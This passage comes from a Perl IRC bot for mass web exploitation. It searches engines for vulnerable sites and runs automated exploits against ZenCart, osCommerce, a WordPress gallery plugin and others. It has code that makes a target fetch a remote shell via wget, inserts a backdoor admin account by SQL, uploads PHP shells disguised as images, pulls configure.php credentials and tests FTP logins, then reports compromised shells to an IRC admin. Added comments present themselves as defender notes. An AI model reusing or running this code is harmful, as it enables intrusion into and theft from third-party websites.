  481. if (&isFound($thumbid,"GIF89")) {
  482. my ($bug,$dork) = ("contact.php",$1);
  483. my $simpan = 'situs.txt';
  484. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan E107 di $path ");
  485. &msg("$path","$e107logo Dork <=> $dork ");
  486. &msg("$path","$e107logo Search Engine <=> Loading ");
  487. &se_start($path,$bug,$simpan,$dork,$engine,7);
  488. } else {
  489. &msg("$path","[!]Injector <=> Lost!!! ");
  490. }
  491. }
  492. }
  493. }
  # Type 8: the WordPress "is-human" plugin path.
  494. if ($msg =~ /^$ihcmd\s+(.*)/) {
  495. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  496. if (&isFound($thumbid,"GIF89")) {
  497. my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php",$1);
  498. my $simpan = 'situs.txt';
  499. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan Is-Human di $path ");
  500. &msg("$path","$ihlogo Dork <=> $dork ");
  501. &msg("$path","$ihlogo Search Engine <=> Loading ");
  502. &se_start($path,$bug,$simpan,$dork,$engine,8);
  503. } else {
  504. &msg("$path","[!]Injector <=> Lost!!! ");
  505. }
  506. }
  507. }
  508. }
  # Type 10: ZenCart (fixed request path, no staging-host check).
  509. if ($msg =~ /^$zencmd\s+(.*)/) {
  510. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  511. my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
  512. my $simpan = 'situs.txt';
  513. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan ZenCart di $path ");
  514. &msg("$path","$zenlogo Dork <=> $dork ");
  515. &msg("$path","$zenlogo Search Engine <=> Loading ");
  516. &se_start($path,$bug,$simpan,$dork,$engine,10);
  517. }
  518. }
  519. }
  # Type 11: "RFG" (placeholder path value, no staging-host check).
  520. if ($msg =~ /^$rfgcmd\s+(.*)/) {
  521. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  522. my ($bug,$dork) = ("apalah",$1);
  523. my $simpan = 'situs.txt';
  524. &msg("$chanxxx","[!] Lapor <=> $nick lagi scan RFG di $path ");
  525. &msg("$path","$rfglogo Dork <=> $dork ");
  526. &msg("$path","$rfglogo Search Engine <=> Loading ");
  527. &se_start($path,$bug,$simpan,$dork,$engine,11);
  528. }
  529. }
  530. }
  # FTP credential check: takes host, user and password from the chat message,
  # attempts one FTP login in a detached grandchild, and reports the result,
  # credentials included, to the requesting nick in clear text over IRC.
  # Not gated by isAdmin(). On the host this appears as an outbound FTP
  # connection from the bot process.
  531. if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) {
  # NOTE(review): these four reads of @_ happen outside any sub, and the
  # values are shadowed by the `my` list below - they have no visible effect.
  532. my $url = $_[0];
  533. my $host = $_[1];
  534. my $user = $_[2];
  535. my $pass = $_[3];
  536. if (my $pid = fork) {
  537. waitpid($pid, 0);
  538. } else {
  539. if (fork) { exit; } else {
  540. my ($host,$user,$pass) = ($1,$2,$3);
  541. &msg("$path","[!]FTP <=> Checking $host | $user:$pass");
  # Inverted flag: 1 is the failure default, 0 means the login succeeded.
  542. my $success = 1;
  543. use Net::FTP;
  # The constructor result is not checked before the method calls below.
  544. my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
  545. $success = 0 if $ftp->login($user,$pass);
  546. $ftp->quit;
  # notice() is defined outside this excerpt.
  547. if ($success == 0) {
  548. &notice("$nick","[FTP] [http://".$host."] [".$user.":".$pass."] Success ");
  549. } else {
  550. &notice("$nick","[FTP] [http://".$host."] [".$user.":".$pass."] Denied ");
  551.  
  552. }
  553. }
  554. }
  555. }
  556. }
  557. }
  # Line reassembly: pass each complete line of the read buffer to parse().
  # An unfinished last line is kept in $line_temp and prepended to the first
  # line of the next read.
  558. for(my $c=0; $c<= $#lines; $c++) {
  559. $line = $lines[$c];
  560. $line = $line_temp.$line if ($line_temp);
  561. $line_temp = '';
  562. $line =~ s/\r$//;
  # Every line except the last is complete by construction of the split.
  563. unless ($c == $#lines) {
  564.  
  565. parse("$line");
  566. } else {
  # The last line is parsed when it is the only line, when it ended in "\r",
  # or when it is a "NOTICE AUTH" banner; otherwise it is buffered.
  567. if ($#lines == 0) {
  568. parse("$line");
  569. } elsif ($lines[$c] =~ /\r$/) {
  570. parse("$line");
  571. } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  572. parse("$line");
  573. } else {
  574. $line_temp = $line;
  575. }
  576. }
  577. }
  578. }
  579. }
  580.  
  581. ##################################################################################
  582.  
  # lobex(DORK): collect candidate host/path strings from search results.
  # Requests result pages for the query (offsets 0 to 1000 in steps of 100),
  # pulls the link targets out of the returned HTML, drops a few excluded
  # domains and keeps the part of each target before ".php".
  # Returns the list of candidates; duplicates are not removed here.
  # search_engine_query() is defined outside this excerpt. The empty prototype
  # is bypassed by the &lobex(...) call form used by the caller.
  583. sub lobex() {
  584. my $dork = $_[0];
  585. my @targets;
  586. for (my $st=0; $st<=1000 ; $st+=100){
  587. my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st;
  588. my $browser = &search_engine_query($engine);
  589. while ($browser =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  590. my $target = $1;
  591. if ($target !~ /google|forum|stackoverflow|php\.net/) {
  592. my @sort = split(/\.php/,$target);
  593. push (@targets,$sort[0]);
  594. }
  595. }
  596. }
  597. return @targets;
  598. }
  599.  
  # cari(CHANNEL, DORK): run the "!cari" search and report the results.
  # Gets candidates from lobex(), filters them through clean(), then requests
  # each candidate's ".php?src=<staging URL>" in a detached grandchild and
  # reports the site to the channel when the response contains
  # "Unable to open image".
  # clean(), get_content() and msg() are defined outside this excerpt.
  # On a probed server these requests appear in access logs as a "src"
  # parameter that carries an external URL.
  600. sub cari() {
  601. my $chan = $_[0];
  602. my $dork = $_[1];
  603. my $count = 0;
  604. my @kotor = &lobex($dork);
  605. my @target = &clean(@kotor);
  606. my $num = scalar(@target); &msg($chan,"$carilogo Total [$num] sites");
  607. if ($num > 0) {
  608. foreach my $site(@target) {
  609. $count++;
  # Sent when the counter reaches $num-1, i.e. before the last site is probed.
  610. if ($count == $num-1) {
  611. &msg("$chan","$carilogo Finished for $dork ");
  612. }
  613. my $test = "http://".$site.".php?src=".$thumbshell;
  # Double fork: one short-lived grandchild per candidate.
  614. if (my $pid = fork) { waitpid($pid, 0); } else {
  615. if (fork) { exit; } else {
  616. my $coba = &get_content($test);
  617. if ($coba =~ /Unable to open image/) {
  618. &msg($chan,"$carilogo VulN -> http://".$site.".php ");
  619. }
  620. } exit;
  621. }
  622. }
  623. }
  624. }
  625.  
  # type(CHAN, BUG, SIMPAN, DORK, ENGINE, TYPE): map the numeric scan type
  # passed by se_start() to the matching family handler and call it with the
  # first five arguments. The handler's return value overwrites $type.
  # Codes as used by the chat handlers: 1 TimThumb, 2 WHMCS, 3 LFI,
  # 4 ZeroBoard, 5 RFI, 6 XML, 7 e107, 8 Is-Human, 9 osCommerce, 10 ZenCart,
  # 11 RFG. Any other value does nothing.
  # All *_exploit handlers are defined outside this excerpt.
  626. sub type() {
  627. my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
  628. if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);}
  629. elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine);}
  630. elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine);}
  631. elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine);}
  632. elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine);}
  633. elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine);}
  634. elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine);}
  635. elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);}
  636. elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine);}
  637. elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine);}
  638. elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine);}
  639. }
  640.  
  641. ##################################################################################
  642.  
  643. sub se_start() {
  644. my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
  645. if ($gps ==1) {
  646. if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAE",$type); } exit; } }
  647. if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAR",$type); } exit; } }
  648. if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAT",$type); } exit; } }
  649. if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAU",$type); } exit; } }
  650. if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBR",$type); } exit; } }
  651. if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCA",$type); } exit; } }
  652. if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCL",$type); } exit; } }
  653. if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCN",$type); } exit; } }
  654. if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCoM",$type); } exit; } }
  655. if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCZ",$type); } exit; } }
  656. if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDE",$type); } exit; } }
  657. if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDK",$type); } exit; } }
  658. if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKES",$type); } exit; } }
  659. if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKEU",$type); } exit; } }
  660. if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKFR",$type); } exit; } }
  661. if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKHU",$type); } exit; } }
  662. if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKID",$type); } exit; } }
  663. if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIL",$type); } exit; } }
  664. if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIN",$type); } exit; } }
  665. if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKInfO",$type); } exit; } }
  666. if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIR",$type); } exit; } }
  667. if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIT",$type); } exit; } }
  668. if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKJP",$type); } exit; } }
  669. if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKKR",$type); } exit; } }
  670. if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMX",$type); } exit; } }
  671. if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMY",$type); } exit; } }
  672. if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNeT",$type); } exit; } }
  673. if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNL",$type); } exit; } }
  674. if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKOrG",$type); } exit; } }
  675. if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPH",$type); } exit; } }
  676. if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPL",$type); } exit; } }
  677. if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRO",$type); } exit; } }
  678. if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRU",$type); } exit; } }
  679. if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKTH",$type); } exit; } }
  680. if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUA",$type); } exit; } }
  681. if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUK",$type); } exit; } }
  682. if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUS",$type); } exit; } }
  683. if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKSI",$type); } exit; } }
  684. if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBE",$type); } exit; } }
  685. if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBIZ",$type); } exit; } }
  686. }
  687. if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } }
  688. if ($gps2 ==1) {
  689. if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } exit; } }
  690. if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type); } exit; } }
  691. if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } }
  692. if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } }
  693. if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit; } }
  694. if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit; } }
  695. if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } exit; } }
  696. if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } }
  697. if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } exit; } }
  698. if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit; } }
  699. if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } }
  700. if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } }
  701. if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } }
  702. }
  703. }
  704.  
  705.  
  706. ###### EXPLOITING #######
  707. sub rfg_exploit() {
       # Scan-and-report routine for the WordPress "radykal-fancy-gallery" plugin.
       # Arguments: IRC channel, bug string, save flag, search dork, engine name.
       # For each host returned by search_engine() it queries a third-party helper
       # page, then works in a detached (double-forked) grandchild process.
       #
       # Defender notes (all values are taken from this block):
       #  - Web logs: requests under wp-content/plugins/radykal-fancy-gallery/admin/
       #    whose query string contains "wget%20".
       #  - File system: a file named bad.php inside that admin/ directory.
       #  - Content: a page containing the marker "stunshell" served from that path.
       #  - $thumbshell is defined outside this view; its value is not visible here.
       #  - Results are sent to both $admin and the requesting channel via msg().
  708. my $chan = $_[0];
  709. my $bugz = $_[1];
  710. my $simpan = $_[2];
  711. my $dork = $_[3];
  712. my $engine = $_[4];
  713. my $count = 0;
  714. my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo);
  715. my $num = scalar(@totexploit);
  716. if ($num > 0){
  717. foreach my $site(@totexploit){
  718. $count++;
  719. if ($count == $num-1) { &msg("$chan","$rfglogo $engine Finished for $dork "); }
  720. my $test = "http://garguritos.com/rfg.php?url=http://".$site;
  721. my $html = &get_content($test);
       # Parent waits only for the first child, which exits at once; the grandchild
       # does the work, so it is re-parented and never shows up as a child of the bot.
  722. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  723. my $vpath = "wp-content/plugins/radykal-fancy-gallery/admin/";
  724. if ($html =~ /<a href=\"http:\/\/(.*)$vpath(.*)\">Your shell/){
  725. my $vuln = $1; my $qr = $2;
  726. my $upl = "http://".$vuln.$vpath.$qr."wget%20".$thumbshell;
  727. my $crut = &get_content($upl);
  728. if ($crut =~ /3xploit/) {
  729. my $shell = "http://".$vuln.$vpath."bad.php";
  730. my $check = &get_content($shell);
  731. if ($check =~ /stunshell/i){
       # Scrapes safe_mode, OS banner and uid out of the returned page for the report.
  732. my $safe = ""; my $os = ""; my $uid = "";
  733. if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
  734. if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  735. if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
  736. &msg("$admin","$rfglogo $engine <=> sHeLL <=> ".$shell." (SafeMode=$safe) (OS=$os) uid=$uid ");
  737. &msg("$chan","$rfglogo $engine <=> sHeLL <=> ".$shell." (SafeMode=$safe) (OS=$os) uid=$uid ");
  738. } else {
  739. &msg("$chan","$rfglogo $engine <=> VulN <=> http://".$vuln.$vpath.$qr." 15");
  740. }
  741. }
  742. }
  743. } exit; }
  744. }
  745. }
  746. }
  747.  
  748. sub zen_exploit() {
       # Iterates over hosts returned by search_engine(), fetches http://<site><bug>
       # and, in a detached grandchild, hands any response containing "zc_install"
       # to zen_query().
       #
       # Defender notes: the only fingerprint used here is the string "zc_install" in
       # the response body. Presumably $bug points at a script inside the Zen Cart
       # installer directory (its value comes from the caller - confirm). An installer
       # directory left on a production store is the exposure being searched for;
       # removing it after installation closes this path.
  749. my $chan = $_[0];
  750. my $bug = $_[1];
  751. my $simpan = $_[2];
  752. my $dork = $_[3];
  753. my $engine = $_[4];
  754. my $count = 0;
  755. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
  756. my $num = scalar(@totexploit);
  757. if ($num > 0){
  758. foreach my $site(@totexploit){
  759. $count++;
  760. if ($count == $num-1) { &msg("$chan","$zenlogo $engine Finished for $dork "); }
  761. my $test = "http://".$site.$bug;
  762. my $html = &get_content($test);
       # Double fork: the parent reaps the first child, the grandchild runs detached.
  763. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  764. if ($html =~ /zc_install/){
  765. &zen_query($chan,$site,$test,$engine);
  766. }
  767. } exit; }
  768. }
  769. }
  770. }
  771.  
  772. sub zen_query() {
       # Sends one form-encoded POST ("query_string=<SQL>") to $test and reports to
       # IRC when the response contains "1 statements processed" or "Duplicate entry".
       # Arguments: channel, site, target URL, engine name. $uagent and $admin are
       # globals defined outside this block.
       #
       # Defender notes (values taken from the literal below):
       #  - Database: a row in the `admin` table with admin_id 56 and admin_name
       #    "adminsys" is a direct indicator that this request succeeded.
       #  - Web logs / WAF: POST bodies carrying a query_string parameter that
       #    starts with INSERT+INTO+admin.
       #  - Response: audit any unexpected admin accounts and rotate admin
       #    credentials if such a row is found.
  773. my $chan = $_[0];
  774. my $url = $_[1];
  775. my $test = $_[2];
  776. my $engine = $_[3];
  777. my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B";
  778. my $req = HTTP::Request->new(POST => $test);
  779. $req->content_type("application/x-www-form-urlencoded");
  780. $req->content("query_string=".$code);
  781. my $ua = LWP::UserAgent->new(agent => $uagent);
  782. $ua->timeout(3);
  783. my $res = $ua->request($req);
  784. my $data = $res->as_string;
       # Both outcomes are announced with the store's admin/login.php URL.
  785. if ( $data =~ /1 statements processed/i ) {
  786. &msg("$chan","$zenlogo $engine <=> VulN <=> http://".$url."admin/login.php ");
  787. &msg("$admin","$zenlogo $engine <=> VulN <=> http://".$url."admin/login.php ");
  788. }
  789. elsif ( $data =~ /Duplicate entry/i ) {
  790. &msg("$chan","$zenlogo $engine <=> SuccesS <=> http://".$url."admin/login.php )");
  791. &msg("$admin","$zenlogo $engine <=> SuccesS <=> http://".$url."admin/login.php ");
  792. }
  793. }
  794.  
  795. sub osco_exploit() {
       # osCommerce routine. For each host from search_engine() it requests three
       # admin scripts with "/login.php" appended as path info, and for every one that
       # answers with an admin table heading it (a) requests includes/configure.php
       # through action=download and passes it to osql_xpl(), and (b) posts two local
       # files under the names lobex.php and lobexdb.php, then checks images/lobex.php.
       #
       # Defender notes (all values are taken from this block):
       #  - Web logs: admin/categories.php/login.php, admin/file_manager.php/login.php,
       #    admin/banner_manager.php/login.php; "action=download&filename=/includes/configure.php".
       #  - File system: images/lobex.php and images/lobexdb.php.
       #  - Content: a page containing "UnKnown - Simple Shell".
       #  - Mitigation (general, not shown in this file): keep the admin directory
       #    behind separate authentication and stop PHP execution in the images/
       #    upload directory; if configure.php was served, treat the database
       #    credentials in it as disclosed.
  796. my $chan = $_[0];
  797. my $bug = $_[1];
  798. my $simpan = $_[2];
  799. my $dork = $_[3];
  800. my $engine = $_[4];
  801. my $count = 0;
  802. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  803. my $num = scalar(@totexploit);
  804. if ($num > 0){
  805. foreach my $site(@totexploit){
  806. $count++;
  807. if ($count == $num-1) { &msg("$chan","$oscologo $engine Finished for $dork "); }
  808. my $cat = "http://".$site."admin/categories.php/login.php";
  809. my $fm = "http://".$site."admin/file_manager.php/login.php";
  810. my $bm = "http://".$site."admin/banner_manager.php/login.php";
  811. my $shell = "http://".$site."images/lobex.php";
  812. my $dumper = "http://".$site."images/lobexdb.php";
  813. my $coba = &get_content($cat);
  814. my $cob2 = &get_content($fm);
  815. my $cob3 = &get_content($bm);
       # Double fork: the parent reaps the first child, the grandchild runs detached.
  816. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
       # --- categories.php branch ---
  817. if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) {
  818. my $test = $cat."?action=download&filename=/includes/configure.php";
  819. my $cek = &get_content($test);
  820. if ($cek =~ /http:\/\//) {
  821. &osql_xpl($test,$chan,$site,$engine);
  822. }
  823. my $aplod = LWP::UserAgent->new;
  824. my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string;
  825. my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string;
  826. my $cekap = &get_content($shell);
  827. if ($cekap =~ /UnKnown - Simple Shell/) {
  828. my $safe = ""; my $os = ""; my $uid = "";
  829. if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  830. if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  831. if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
  832. &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
  833. &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
  834. &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
  835. }
  836. }
       # --- file_manager.php branch (same steps, form field file_1) ---
  837. if ($cob2 =~ /TABLE_HEADING_FILENAME/i) {
  838. my $test2 = $fm."?action=download&filename=/includes/configure.php";
  839. my $cek2 = &get_content($test2);
  840. if ($cek2 =~ /http:\/\//) {
  841. &osql_xpl($test2,$chan,$site,$engine);
  842. }
  843. my $aplod2 = LWP::UserAgent->new;
  844. my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string;
  845. my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string;
  846. my $cekap = &get_content($shell);
  847. if ($cekap =~ /UnKnown - Simple Shell/) {
  848. my $safe = ""; my $os = ""; my $uid = "";
  849. if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  850. if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  851. if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
  852. &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
  853. &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
  854. &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
  855. }
  856. }
       # --- banner_manager.php branch (same steps, form field banners_image) ---
  857. if ($cob3 =~ /TABLE_HEADING_BANNERS/i) {
  858. my $test3 = $bm."?action=download&filename=/includes/configure.php";
  859. my $cek3 = &get_content($test3);
  860. if ($cek3 =~ /http:\/\//) {
  861. &osql_xpl($test3,$chan,$site,$engine);
  862. }
  863. my $aplod3 = LWP::UserAgent->new;
  864. my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string;
  865. my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string;
  866. my $cekap = &get_content($shell);
  867. if ($cekap =~ /UnKnown - Simple Shell/) {
  868. my $safe = ""; my $os = ""; my $uid = "";
  869. if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  870. if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
  871. if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
